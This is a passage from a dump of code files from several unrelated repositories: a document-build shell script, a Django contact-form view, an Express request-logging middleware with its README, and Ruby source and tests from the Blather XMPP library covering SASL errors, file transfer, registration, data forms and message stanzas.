] | 1 | JavaScript | paulrrdiaz/flexbox | a39e45f63a67177716eea0fa01085560a5991f55 | ce020fb30469d03d10ad02db45257f1b97e63525 |
refs/heads/master | <file_sep>echo "*** Producing HTML ***"
asciidoctor mysample.adoc
echo "*** Producing DOCBOOK ***"
asciidoctor -n -b docbook -d book mysample.adoc -o mysample.xml
echo "*** Producing EPUB ***"
pandoc -f docbook -t epub -N --number-sections --chapters --toc --toc-depth=4 mysample.xml -o mysample.epub
echo "*** Producing PDF ***"
asciidoctor-pdf mysample.adoc
| b4840b6b259a6229285eb5dd1fa828b0dea29220 | [
"Shell"
] | 1 | Shell | nidmgh/nidmbook | 2abb6832f649eb2966ae382f7bcdfa99890024a8 | 92936ec337ff06c1cb4acded6ceaa3b93620643a |
refs/heads/master | <file_sep>from django import forms
class ContactForm(forms.Form):
full_name = forms.CharField(max_length=120)
email = forms.EmailField(max_length=150)
message = forms.CharField(widget= forms.Textarea, max_length=2000)<file_sep>from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.core.mail import send_mail, BadHeaderError
from rootapp.forms import ContactForm
# Create your views here.
def root(request):
if request.method == 'POST':
form = ContactForm(request.POST)
if form.is_valid():
subject = 'website_inquiry'
body = {
'name' : form.cleaned_data['full_name'],
'email' : form.cleaned_data['email'],
'message' : form.cleaned_data['message']
}
message = "\n".join(body.values())
try:
send_mail(subject, message, '<EMAIL>', ['<EMAIL>'])
except BadHeaderError:
return HttpResponse("Invalid Header Found.")
form = ContactForm()
# return redirect('/#foot', {'submitted' : True})
return render(request, 'rootapp/index.html', {'submitted' : True})
form = ContactForm()
return render(request, 'rootapp/index.html', {'form' : form, 'submitted' : False}) | 12f5cd61206414c30b1685f0655be7193881f0da | [
"Python"
] | 2 | Python | seemab-yamin/resumeproject | b03e67c48dfd8d89428e6934f5633fa3dcc5c8cd | 33e22e41dfff91cf9884baf4c060f32f0da6508f |
refs/heads/main | <repo_name>rubytsaitw/middleware-practice<file_sep>/app.js
const express = require('express')
const app = express()
const PORT = 5000
const getActualRequestDurationInMilliseconds = start => {
const NS_PER_SEC = 1e9; // convert to nanoseconds
const NS_TO_MS = 1e6; // convert to milliseconds
const diff = process.hrtime(start);
return (diff[0] * NS_PER_SEC + diff[1]) / NS_TO_MS;
};
let demoLogger = (req, res, next) => {
let currentDateTime = new Date()
let formattedDate =
currentDateTime.getFullYear() +
'-' +
currentDateTime.getMonth() +
'-' +
currentDateTime.getDate() +
' ' +
currentDateTime.getHours() +
'-' +
currentDateTime.getMinutes() +
'-' +
currentDateTime.getSeconds()
let method = req.method
let url = req.url
const start = process.hrtime();
const durationInMilliseconds = getActualRequestDurationInMilliseconds(start);
console.log(`${formattedDate} | ${method} from ${url} | total time: ${durationInMilliseconds.toLocaleString()} ms`)
next()
}
app.use(demoLogger)
app.get('/', (req, res) => {
res.send('列出全部 Todo')
})
app.get('/new', (req, res) => {
res.send('新增 Todo 頁面')
})
app.get('/:id', (req, res) => {
res.send('顯示一筆 Todo')
})
app.post('/', (req, res) => {
res.send('新增一筆 Todo')
})
app.listen(PORT, () => {
console.log(`App is running on port ${PORT}`)
})
// Reference
// https://codesource.io/creating-a-logging-middleware-in-expressjs/<file_sep>/README.md
# Middleware Practice
Create a middleware to log the request info from browser.
## Function List
When server gets a request, print below info in server log
- time-stamps, local Taipei time
- HTTP request method
- URL
- request duration in milliseconds (ms)
## Environment SetUp
[Express.js](https://expressjs.com/)
## Install - 安裝流程
1. 開啟終端機(Terminal),cd 到存放專案本機位置並執行:
```
git clone https://github.com/rubytsaitw/middleware-practice
```
2. 進入專案資料夾
```
cd middleware-practice
```
3. 安裝 npm 套件
```
npm install
```
4. 安裝 nodemon 套件 (若未安裝)
```
npm install -g nodemon
```
5. 啟動伺服器,執行 app.js 檔案
```
npm run start
```
6. 當 terminal 出現以下字樣,表示啟動完成
```
The Express server is running on http://localhost:5000
```
請至[http://localhost:5000](http://localhost:5000)開始使用程式
## Contributor - 專案開發人員
> [<NAME>](https://github.com/rubytsaitw) | c16c8145bd461699fe126c2b1c1e53eee1730c87 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | rubytsaitw/middleware-practice | 0f248840dfe2a12d624be10d84b2994d4833145e | 2ee1b4b18ea3ee98e4a5adbc1149040a5c3dca8a |
refs/heads/master | <repo_name>mixiu7992/ViewRow<file_sep>/Podfile
platform :ios, '10.0'
source 'https://github.com/CocoaPods/Specs.git'
target 'Example' do
use_frameworks!
pod 'Eureka', '>= 4.3.0'
pod 'SwiftChart'
end
| 6d11fefdda7c443ee3d0478011410e50107538c4 | [
"Ruby"
] | 1 | Ruby | mixiu7992/ViewRow | b40ac19ddd08f87b252a4aece1722edbcabfbdd4 | 6c9feefb09af540d6d7bbbbab89bdc96807baf75 |
refs/heads/develop | <repo_name>adhearsion/blather<file_sep>/lib/blather/errors/sasl_error.rb
module Blather
# General SASL Errors
# Check #name for the error name
#
# @handler :sasl_error
class SASLError < BlatherError
# @private
SASL_ERR_NS = 'urn:ietf:params:xml:ns:xmpp-sasl'
class_attribute :err_name
# @private
@@registrations = {}
register :sasl_error
# Import the stanza
#
# @param [Blather::XMPPNode] node the error node
# @return [Blather::SASLError]
def self.import(node)
self.new node
end
# Create a new SASLError
#
# @param [Blather::XMPPNode] node the error node
def initialize(node)
super()
@node = node
end
# The actual error name
#
# @return [Symbol] a symbol representing the error name
def name
if @node
name = @node.find_first('ns:*', :ns => SASL_ERR_NS).element_name
name.gsub('-', '_').to_sym
end
end
end # SASLError
end # Blather
<file_sep>/spec/blather/stanza/pubsub/subscriptions_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
def control_subscriptions
{ :subscribed => [{:node => 'node1', :jid => '<EMAIL>', :subid => 'fd8237yr872h3f289j2'}, {:node => 'node2', :jid => '<EMAIL>', :subid => 'h8394hf8923ju'}],
:unconfigured => [{:node => 'node3', :jid => '<EMAIL>'}],
:pending => [{:node => 'node4', :jid => '<EMAIL>'}],
:none => [{:node => 'node5', :jid => '<EMAIL>'}] }
end
describe Blather::Stanza::PubSub::Subscriptions do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:subscriptions, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Subscriptions)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(subscriptions_xml)).to be_instance_of Blather::Stanza::PubSub::Subscriptions
end
it 'ensures an subscriptions node is present on create' do
subscriptions = Blather::Stanza::PubSub::Subscriptions.new
expect(subscriptions.find('//ns:pubsub/ns:subscriptions', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures an subscriptions node exists when calling #subscriptions' do
subscriptions = Blather::Stanza::PubSub::Subscriptions.new
subscriptions.pubsub.remove_children :subscriptions
expect(subscriptions.find('//ns:pubsub/ns:subscriptions', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(subscriptions.subscriptions).not_to be_nil
expect(subscriptions.find('//ns:pubsub/ns:subscriptions', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures the subscriptions node is not duplicated when calling #subscriptions' do
subscriptions = Blather::Stanza::PubSub::Subscriptions.new
subscriptions.pubsub.remove_children :subscriptions
expect(subscriptions.find('//ns:pubsub/ns:subscriptions', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
5.times { subscriptions.subscriptions }
expect(subscriptions.find('//ns:pubsub/ns:subscriptions', :ns => Blather::Stanza::PubSub.registered_ns).count).to eq(1)
end
it 'defaults to a get node' do
aff = Blather::Stanza::PubSub::Subscriptions.new
expect(aff.type).to eq(:get)
end
it 'sets the host if requested' do
aff = Blather::Stanza::PubSub::Subscriptions.new :get, 'pubsub.jabber.local'
expect(aff.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'can import a subscriptions result node' do
node = parse_stanza(subscriptions_xml).root
subscriptions = Blather::Stanza::PubSub::Subscriptions.new.inherit node
expect(subscriptions.size).to eq(4)
expect(subscriptions.list).to eq(control_subscriptions)
end
it 'will iterate over each subscription' do
node = parse_stanza(subscriptions_xml).root
subscriptions = Blather::Stanza::PubSub::Subscriptions.new.inherit node
subscriptions.each do |type, nodes|
expect(nodes).to eq(control_subscriptions[type])
end
end
end
<file_sep>/spec/blather/stanza/pubsub/items_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Items do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:items, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Items)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(items_all_nodes_xml)).to be_instance_of Blather::Stanza::PubSub::Items
end
it 'ensures an items node is present on create' do
items = Blather::Stanza::PubSub::Items.new
expect(items.find('//ns:pubsub/ns:items', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures an items node exists when calling #items' do
items = Blather::Stanza::PubSub::Items.new
items.pubsub.remove_children :items
expect(items.find('//ns:pubsub/ns:items', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(items.items).not_to be_nil
expect(items.find('//ns:pubsub/ns:items', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'defaults to a get node' do
aff = Blather::Stanza::PubSub::Items.new
expect(aff.type).to eq(:get)
end
it 'ensures newly inherited items are PubSubItem objects' do
items = Blather::XMPPNode.parse(items_all_nodes_xml)
expect(items.map { |i| i.class }.uniq).to eq([Blather::Stanza::PubSub::PubSubItem])
end
it 'will iterate over each item' do
n = parse_stanza items_all_nodes_xml
items = Blather::Stanza::PubSub::Items.new.inherit n.root
count = 0
items.each { |i| expect(i).to be_instance_of Blather::Stanza::PubSub::PubSubItem; count += 1 }
expect(count).to eq(4)
end
it 'can create an items request node to request all items' do
host = 'pubsub.jabber.local'
node = 'princely_musings'
items = Blather::Stanza::PubSub::Items.request host, node
expect(items.find("//ns:items[@node=\"#{node}\"]", :ns => Blather::Stanza::PubSub.registered_ns).size).to eq(1)
expect(items.to).to eq(Blather::JID.new(host))
expect(items.node).to eq(node)
end
it 'can create an items request node to request some items' do
host = 'pubsub.jabber.local'
node = 'princely_musings'
items = %w[item1 item2]
items_xpath = items.map { |i| "@id=\"#{i}\"" } * ' or '
items = Blather::Stanza::PubSub::Items.request host, node, items
expect(items.find("//ns:items[@node=\"#{node}\"]/ns:item[#{items_xpath}]", :ns => Blather::Stanza::PubSub.registered_ns).size).to eq(2)
expect(items.to).to eq(Blather::JID.new(host))
expect(items.node).to eq(node)
end
it 'can create an items request node to request "max_number" of items' do
host = 'pubsub.jabber.local'
node = 'princely_musings'
max = 3
items = Blather::Stanza::PubSub::Items.request host, node, nil, max
expect(items.find("//ns:pubsub/ns:items[@node=\"#{node}\" and @max_items=\"#{max}\"]", :ns => Blather::Stanza::PubSub.registered_ns).size).to eq(1)
expect(items.to).to eq(Blather::JID.new(host))
expect(items.node).to eq(node)
expect(items.max_items).to eq(max)
end
end
<file_sep>/lib/blather/stanza/disco/disco_info.rb
module Blather
class Stanza
# # DiscoInfo Stanza
#
# [XEP-0030 Disco Info](http://xmpp.org/extensions/xep-0030.html#info)
#
# Disco Info node that provides or retreives information about a jabber entity
#
# @handler :disco_info
class DiscoInfo < Disco
register :disco_info, nil, 'http://jabber.org/protocol/disco#info'
# Create a new DiscoInfo stanza
# @param [:get, :set, :result, :error, nil] type the Iq stanza type
# @param [String, nil] node the name of the node the info belongs to
# @param [Array<Array, DiscoInfo::Identity>, nil] identities a list of
# identities. these are passed directly to DiscoInfo::Identity.new
# @param [Array<Array, DiscoInfo::Identity>, nil] features a list of
# features. these are passed directly to DiscoInfo::Feature.new
# @return [DiscoInfo] a new DiscoInfo stanza
def self.new(type = nil, node = nil, identities = [], features = [])
new_node = super type
new_node.node = node
new_node.identities = [identities]
new_node.features = [features]
new_node
end
# List of identity objects
def identities
query.find('//ns:identity', :ns => self.class.registered_ns).map do |i|
Identity.new i
end
end
# Add an array of identities
# @param identities the array of identities, passed directly to Identity.new
def identities=(identities)
query.find('//ns:identity', :ns => self.class.registered_ns).each &:remove
if identities
[identities].flatten.each { |i| self.query << Identity.new(i) }
end
end
# List of feature objects
def features
query.find('//ns:feature', :ns => self.class.registered_ns).map do |f|
Feature.new f
end
end
# Add an array of features
# @param features the array of features, passed directly to Feature.new
def features=(features)
query.find('//ns:feature', :ns => self.class.registered_ns).each &:remove
if features
[features].flatten.each { |f| self.query << Feature.new(f) }
end
end
# Compare two DiscoInfo objects by name, type and category
# @param [DiscoInfo] o the Identity object to compare against
# @return [true, false]
def eql?(o, *fields)
super o, *(fields + [:identities, :features])
end
# DiscoInfo::Identity
class Identity < XMPPNode
# Create a new DiscoInfo::Identity
# @overload new(node)
# Imports the XML::Node to create a Identity object
# @param [XML::Node] node the node object to import
# @overload new(opts = {})
# Creates a new Identity using a hash of options
# @param [Hash] opts a hash of options
# @option opts [String] :name the name of the identity
# @option opts [String] :type the type of the identity
# @option opts [String] :category the category of the identity
# @overload new(name, type = nil, category = nil)
# Create a new Identity by name
# @param [String] name the name of the Identity
# @param [String, nil] type the type of the Identity
# @param [String, nil] category the category of the Identity
def self.new(name, type = nil, category = nil, xml_lang = nil)
return name if name.class == self
new_node = super :identity
case name
when Nokogiri::XML::Node
new_node.inherit name
when Hash
new_node.name = name[:name]
new_node.type = name[:type]
new_node.category = name[:category]
new_node.xml_lang = name[:xml_lang]
else
new_node.name = name
new_node.type = type
new_node.category = category
new_node.xml_lang = xml_lang
end
new_node
end
# The Identity's category
# @return [Symbol, nil]
def category
read_attr :category, :to_sym
end
# Set the Identity's category
# @param [String, Symbol] category the new category
def category=(category)
write_attr :category, category
end
# The Identity's type
# @return [Symbol, nil]
def type
read_attr :type, :to_sym
end
# Set the Identity's type
# @param [String, Symbol] type the new category
def type=(type)
write_attr :type, type
end
# The Identity's name
# @return [String]
def name
read_attr :name
end
# Set the Identity's name
# @param [String] name the new name for the identity
def name=(name)
write_attr :name, name
end
# The Identity's xml_lang
# @return [String]
def xml_lang
read_attr "xml:lang"
end
# Set the Identity's name
# @param [String] name the new name for the identity
def xml_lang=(xml_lang)
write_attr "xml:lang", xml_lang
end
# Compare two Identity objects by name, type and category
# @param [DiscoInfo::Identity] o the Identity object to compare against
# @return [true, false]
def eql?(o, *fields)
super o, *(fields + [:name, :type, :category, :xml_lang])
end
end # Identity
# DiscoInfo::Feature
class Feature < XMPPNode
# Create a new DiscoInfo::Feature object
# @overload new(node)
# Create a new Feature by importing an XML::Node
# @param [XML::Node] node an XML::Node to import
# @overload new(var)
# Create a new feature by var
# @param [String] var a the Feautre's var
# @return [DiscoInfo::Feature]
def self.new(var)
return var if var.class == self
new_node = super :feature
case var
when Nokogiri::XML::Node
new_node.inherit var
else
new_node.var = var
end
new_node
end
# The Feature's var
# @return [String]
def var
read_attr :var
end
# Set the Feature's var
# @param [String] var the new var
def var=(var)
write_attr :var, var
end
# Compare two DiscoInfo::Feature objects by name, type and category
# @param [DiscoInfo::Feature] o the Identity object to compare against
# @return [true, false]
def eql?(o, *fields)
super o, *(fields + [:var])
end
end
end # Feature
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/x.rb
module Blather
class Stanza
# # X Stanza
#
# [XEP-0004 Data Forms](http://xmpp.org/extensions/xep-0004.html)
#
# Data Form node that allows for semi-structured data exchange
#
# @handler :x
class X < XMPPNode
register :x, 'jabber:x:data'
# @private
VALID_TYPES = [:cancel, :form, :result, :submit].freeze
# Create a new X node
# @param [:cancel, :form, :result, :submit, nil] type the x:form type
# @param [Array<Array, X::Field>, nil] fields a list of fields.
# These are passed directly to X::Field.new
# @return [X] a new X stanza
def self.new(type = nil, fields = [])
new_node = super :x
case type
when Nokogiri::XML::Node
new_node.inherit type
when Hash
new_node.type = type[:type]
new_node.fields = type[:fields]
else
new_node.type = type
new_node.fields = fields
end
new_node
end
# Find the X node on the parent or create a new one
#
# @param [Blather::Stanza] parent the parent node to search under
# @return [Blather::Stanza::X]
def self.find_or_create(parent)
if found_x = parent.find_first('ns:x', :ns => self.registered_ns)
x = self.new found_x
found_x.remove
else
x = self.new
end
parent << x
x
end
# The Form's type
# @return [Symbol]
def type
read_attr :type, :to_sym
end
# Set the Form's type
# @param [:cancel, :form, :result, :submit] type the new type for the form
def type=(type)
if type && !VALID_TYPES.include?(type.to_sym)
raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
end
write_attr :type, type
end
# List of field objects
# @return [Blather::Stanza::X::Field]
def fields
self.find('ns:field', :ns => self.class.registered_ns).map do |field|
Field.new(field)
end
end
# Find a field by var
# @param var the var for the field you wish to find
def field(var)
fields.detect { |f| f.var == var }
end
# Add an array of fields to form
# @param fields the array of fields, passed directly to Field.new
def fields=(fields)
remove_children :field
[fields].flatten.each do |field|
self << (f = Field.new(field))
f.namespace = self.namespace
end
end
# Check if the x is of type :cancel
#
# @return [true, false]
def cancel?
self.type == :cancel
end
# Check if the x is of type :form
#
# @return [true, false]
def form?
self.type == :form
end
# Check if the x is of type :result
#
# @return [true, false]
def result?
self.type == :result
end
# Check if the x is of type :submit
#
# @return [true, false]
def submit?
self.type == :submit
end
# Retrieve the form's instructions
#
# @return [String]
def instructions
content_from 'ns:instructions', :ns => self.registered_ns
end
# Set the form's instructions
#
# @param [String] instructions the form's instructions
def instructions=(instructions)
self.remove_children :instructions
if instructions
self << (i = XMPPNode.new(:instructions, self.document))
i.namespace = self.namespace
i.content = instructions
end
end
# Retrieve the form's title
#
# @return [String]
def title
content_from 'ns:title', :ns => self.registered_ns
end
# Set the form's title
#
# @param [String] title the form's title
def title=(title)
self.remove_children :title
if title
self << (t = XMPPNode.new(:title))
t.namespace = self.namespace
t.content = title
end
end
# Field stanza fragment
class Field < XMPPNode
register :field, 'jabber:x:data'
# @private
VALID_TYPES = [:boolean, :fixed, :hidden, :"jid-multi", :"jid-single", :"list-multi", :"list-single", :"text-multi", :"text-private", :"text-single"].freeze
# Create a new X Field
# @overload new(node)
# Imports the XML::Node to create a Field object
# @param [XML::Node] node the node object to import
# @overload new(opts = {})
# Creates a new Field using a hash of options
# @param [Hash] opts a hash of options
# @option opts [String] :var the variable for the field
# @option opts [:boolean, :fixed, :hidden, :"jid-multi", :"jid-single", :"list-multi", :"list-single", :"text-multi", :"text-private", :"text-single"] :type the type of the field
# @option opts [String] :label the label for the field
# @option [String, nil] :value the value for the field
# @option [String, nil] :description the description for the field
# @option [true, false, nil] :required the required flag for the field
# @param [Array<Array, X::Field::Option>, nil] :options a list of field options.
# These are passed directly to X::Field::Option.new
# @overload new(type, var = nil, label = nil)
# Create a new Field by name
# @param [String, nil] var the variable for the field
# @param [:boolean, :fixed, :hidden, :"jid-multi", :"jid-single", :"list-multi", :"list-single", :"text-multi", :"text-private", :"text-single"] type the type of the field
# @param [String, nil] label the label for the field
# @param [String, nil] value the value for the field
# @param [String, nil] description the description for the field
# @param [true, false, nil] required the required flag for the field
# @param [Array<Array, X::Field::Option>, nil] options a list of field options.
# These are passed directly to X::Field::Option.new
def self.new(var, type = nil, label = nil, value = nil, description = nil, required = false, options = [])
new_node = super :field
case var
when Nokogiri::XML::Node
new_node.inherit var
when Hash
new_node.var = var[:var]
new_node.type = var[:type]
new_node.label = var[:label]
new_node.value = var[:value]
new_node.desc = var[:description]
new_node.required = var[:required]
new_node.options = var[:options]
else
new_node.var = var
new_node.type = type
new_node.label = label
new_node.value = value
new_node.desc = description
new_node.required = required
new_node.options = options
end
new_node
end
# The Field's type
# @return [String]
def type
read_attr :type
end
# Set the Field's type
# @param [#to_sym] type the new type for the field
def type=(type)
if type && !VALID_TYPES.include?(type.to_sym)
raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
end
write_attr :type, type
end
# The Field's var
# @return [String]
def var
read_attr :var
end
# Set the Field's var
# @param [String] var the new var for the field
def var=(var)
write_attr :var, var
end
# The Field's label
# @return [String]
def label
read_attr :label
end
# Set the Field's label
# @param [String] label the new label for the field
def label=(label)
write_attr :label, label
end
# Get the field's value
#
# @param [String]
def value
children = if self.namespace
xpath('ns:value', ns: self.namespace.href)
else
xpath(:value)
end
return children.first&.content if children.length < 2
children.map(&:content)
end
# Set the field's value
#
# @param [String, Array] one or more values for the field
def value=(value)
self.remove_children :value
return unless value
Array(value).each do |val|
self << (v = XMPPNode.new(:value))
v.namespace = self.namespace
v.content = val
end
end
# Get the field's description
#
# @param [String]
def desc
if self.namespace
content_from 'ns:desc', :ns => self.namespace.href
else
content_from :desc
end
end
# Set the field's description
#
# @param [String] description the field's description
def desc=(description)
self.remove_children :desc
if description
self << (d = XMPPNode.new(:desc))
d.namespace = self.namespace
d << description
end
end
# Get the field's required flag
#
# @param [true, false]
def required?
!!if self.namespace
self.find_first 'ns:required', :ns => self.namespace.href
else
self.find_first 'required'
end
end
# Set the field's required flag
#
# @param [true, false] required the field's required flag
def required=(required)
return self.remove_children(:required) unless required
self << (r = XMPPNode.new(:required))
r.namespace = self.namespace
end
# Extract list of option objects
#
# @return [Blather::Stanza::X::Field::Option]
def options
if self.namespace
self.find('ns:option', :ns => self.namespace.href)
else
self.find('option')
end.map { |f| Option.new(f) }
end
# Add an array of options to field
# @param options the array of options, passed directly to Option.new
def options=(options)
remove_children :option
if options
Array(options).each { |o| self << Option.new(o) }
end
end
# Compare two Field objects by type, var and label
# @param [X::Field] o the Field object to compare against
# @return [true, false]
def eql?(o, *fields)
super o, *(fields + [:type, :var, :label, :desc, :required?, :value])
end
# Option stanza fragment
class Option < XMPPNode
register :option, 'jabber:x:data'
# Create a new X Field Option
# @overload new(node)
# Imports the XML::Node to create a Field option object
# @param [XML::Node] node the node object to import
# @overload new(opts = {})
# Creates a new Field option using a hash of options
# @param [Hash] opts a hash of options
# @option opts [String] :value the value of the field option
# @option opts [String] :label the human readable label for the field option
# @overload new(value, label = nil)
# Create a new Field option by name
# @param [String] value the value of the field option
# @param [String, nil] label the human readable label for the field option
def self.new(value, label = nil)
new_node = super :option
case value
when Nokogiri::XML::Node
new_node.inherit value
when Hash
new_node.value = value[:value]
new_node.label = value[:label]
else
new_node.value = value
new_node.label = label
end
new_node
end
# The Field Option's value
# @return [String]
def value
if self.namespace
content_from 'ns:value', :ns => self.namespace.href
else
content_from :value
end
end
# Set the Field Option's value
# @param [String] value the new value for the field option
def value=(value)
self.remove_children :value
if value
self << (v = XMPPNode.new(:value))
v.namespace = self.namespace
v << value
end
end
# The Field Option's label
# @return [String]
def label
read_attr :label
end
# Set the Field Option's label
# @param [String] label the new label for the field option
def label=(label)
write_attr :label, label
end
end # Option
end # Field
end # X
end #Stanza
end
<file_sep>/lib/blather/file_transfer/s5b.rb
module Blather
class FileTransfer
# SOCKS5 Bytestreams Transfer helper
# Takes care of accepting, declining and offering file transfers through the stream
class S5b
# Set this to false if you don't want to fallback to In-Band Bytestreams
attr_accessor :allow_ibb_fallback
# Set this to true if the buddies of your bot will be in the same local network
#
# Usually IM clients advertise all network addresses which they can determine.
# Skipping the local ones can save time if your bot is not in the same local network as it's buddies
attr_accessor :allow_private_ips
def initialize(stream, iq)
@stream = stream
@iq = iq
@allow_ibb_fallback = true
@allow_private_ips = false
end
# Accept an incoming file-transfer
#
# @param [module] handler the handler for incoming data, see Blather::FileTransfer::SimpleFileReceiver for an example
# @param [Array] params the params to be passed into the handler
def accept(handler, *params)
@streamhosts = @iq.streamhosts
@streamhosts.delete_if {|s| begin IPAddr.new(s.host).private? rescue false end } unless @allow_private_ips
@socket_address = Digest::SHA1.hexdigest("#{@iq.sid}#{@iq.from}#{@iq.to}")
@handler = handler
@params = params
connect_next_streamhost
@stream.clear_handlers :s5b_open, :from => @iq.from
end
# Decline an incoming file-transfer
def decline
@stream.clear_handlers :s5b_open, :from => @iq.from
@stream.write StanzaError.new(@iq, 'not-acceptable', :auth).to_node
end
# Offer a file to somebody, not implemented yet
def offer
# TODO: implement
end
private
def connect_next_streamhost
if streamhost = @streamhosts.shift
connect(streamhost)
else
if @allow_ibb_fallback
@stream.register_handler :ibb_open, :from => @iq.from, :sid => @iq.sid do |iq|
transfer = Blather::FileTransfer::Ibb.new(@stream, iq)
transfer.accept(@handler, *@params)
true
end
end
@stream.write StanzaError.new(@iq, 'item-not-found', :cancel).to_node
end
end
def connect(streamhost)
begin
socket = EM.connect streamhost.host, streamhost.port, SocketConnection, @socket_address, 0, @handler, *@params
socket.callback do
answer = @iq.reply
answer.streamhosts = nil
answer.streamhost_used = streamhost.jid
@stream.write answer
end
socket.errback do
connect_next_streamhost
end
rescue EventMachine::ConnectionError => e
connect_next_streamhost
end
end
# @private
class SocketConnection < EM::P::Socks5
include EM::Deferrable
def initialize(host, port, handler, *params)
super(host, port)
@@handler = handler
@params = params
end
def post_init
self.succeed
class << self
include @@handler
end
send(:initialize, *@params)
post_init
end
def unbind
self.fail if @socks_state != :connected
end
end
end
end
end
<file_sep>/lib/blather/stream/features/register.rb
module Blather
class Stream
class Register < Features
REGISTER_NS = "http://jabber.org/features/iq-register".freeze
register REGISTER_NS
def initialize(stream, succeed, fail)
super
@jid = @stream.jid
@pass = @stream.password
end
def receive_data(stanza)
error_node = stanza.xpath("//error").first
if error_node
fail!(BlatherError.new(stanza))
elsif stanza['type'] == 'result' && (stanza.content.empty? || stanza.children.find { |v| v.element_name == "query" })
succeed!
else
@stream.send register_query
end
end
def register_query
node = Blather::Stanza::Iq::Query.new(:set)
query_node = node.xpath('//query').first
query_node['xmlns'] = 'jabber:iq:register'
Nokogiri::XML::Builder.with(query_node) do |xml|
xml.username @jid.node
xml.password @pass
end
node
end
end
end
end
<file_sep>/spec/blather/stanza/message_spec.rb
require 'spec_helper'
def ichat_message_xml
<<-XML
<message from="<EMAIL>/balcony" to="<EMAIL>" type="chat" id="iChat_5FA6C6DC">
<body>Hello</body>
<html xmlns="http://www.w3.org/1999/xhtml">
<body style="background-color:#7bb5ee;color:#000000;">
<span style="font-family: 'Arial';font-size: 12px;color: #262626;">Hello</span>
<img alt="f5ad3a04d218d7160fa02415e02d41b3.jpg" src="message-attachments:1" width="30" height="30"/>
</body>
</html>
<x xmlns="http://www.apple.com/xmpp/message-attachments">
<attachment id="1">
<sipub xmlns="http://jabber.org/protocol/sipub" from="<EMAIL>/balcony" id="sipubid_77933F62" mime-type="binary/octet-stream" profile="http://jabber.org/protocol/si/profile/file-transfer">
<file xmlns="http://jabber.org/protocol/si/profile/file-transfer" xmlns:ichat="apple:profile:transfer-extensions" name="f5ad3a04d218d7160fa02415e02d41b3.jpg" size="1245" posixflags="000001A4"/>
</sipub>
</attachment>
</x>
<iq type="set" id="iChat_4CC32F1F" to="<EMAIL>">
<si xmlns="http://jabber.org/protocol/si" id="sid_60C2D273" mime-type="binary/octet-stream" profile="http://jabber.org/protocol/si/profile/file-transfer">
<file xmlns="http://jabber.org/protocol/si/profile/file-transfer" xmlns:ichat="apple:profile:transfer-extensions" name="f5ad3a04d218d7160fa02415e02d41b3.jpg" size="1245" posixflags="000001A4"/>
<feature xmlns="http://jabber.org/protocol/feature-neg">
<x xmlns="jabber:x:data" type="form">
<field type="list-single" var="stream-method">
<option><value>http://jabber.org/protocol/bytestreams</value></option>
</field>
</x>
</feature>
</si>
</iq>
</message>
XML
end
def message_xml
<<-XML
<message
to='<EMAIL>'
from='<EMAIL>/balcony'
type='chat'
xml:lang='en'>
<body>Wherefore art thou, Romeo?</body>
<x xmlns='jabber:x:data' type='form'>
<field var='field-name' type='text-single' label='description' />
</x>
<paused xmlns="http://jabber.org/protocol/chatstates"/>
</message>
XML
end
def delayed_message_xml
<<-XML
<message
from='<EMAIL>/firstwitch'
id='162BEBB1-F6DB-4D9A-9BD8-CFDCC801A0B2'
to='<EMAIL>/broom'
type='groupchat'>
<body>Thrice the brinded cat hath mew'd.</body>
<delay xmlns='urn:xmpp:delay'
from='<EMAIL>'
stamp='2002-10-13T23:58:37Z'>
Too slow
</delay>
</message>
XML
end
describe Blather::Stanza::Message do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:message, nil)).to eq(Blather::Stanza::Message)
end
it 'must be importable' do
expect(Blather::XMPPNode.parse(message_xml)).to be_instance_of Blather::Stanza::Message
expect(Blather::XMPPNode.parse(ichat_message_xml)).to be_instance_of Blather::Stanza::Message
end
it 'provides "attr_accessor" for body' do
s = Blather::Stanza::Message.new
expect(s.body).to be_nil
expect(s.find('body')).to be_empty
s.body = 'test message'
expect(s.body).not_to be_nil
expect(s.find('body')).not_to be_empty
end
it 'provides "attr_accessor" for subject' do
s = Blather::Stanza::Message.new
expect(s.subject).to be_nil
expect(s.find('subject')).to be_empty
s.subject = 'test subject'
expect(s.subject).not_to be_nil
expect(s.find('subject')).not_to be_empty
end
it 'provides "attr_accessor" for thread' do
s = Blather::Stanza::Message.new
expect(s.thread).to be_nil
expect(s.find('thread')).to be_empty
s.thread = 1234
expect(s.thread).not_to be_nil
expect(s.find('thread')).not_to be_empty
end
it 'can set a parent attribute for thread' do
s = Blather::Stanza::Message.new
expect(s.thread).to be_nil
expect(s.find('thread')).to be_empty
s.thread = {4321 => 1234}
expect(s.thread).to eq('1234')
expect(s.parent_thread).to eq('4321')
expect(s.find('thread[@parent="4321"]')).not_to be_empty
end
it 'ensures type is one of Blather::Stanza::Message::VALID_TYPES' do
expect { Blather::Stanza::Message.new nil, nil, :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::Stanza::Message::VALID_TYPES.each do |valid_type|
msg = Blather::Stanza::Message.new nil, nil, valid_type
expect(msg.type).to eq(valid_type)
end
end
Blather::Stanza::Message::VALID_TYPES.each do |valid_type|
it "provides a helper (#{valid_type}?) for type #{valid_type}" do
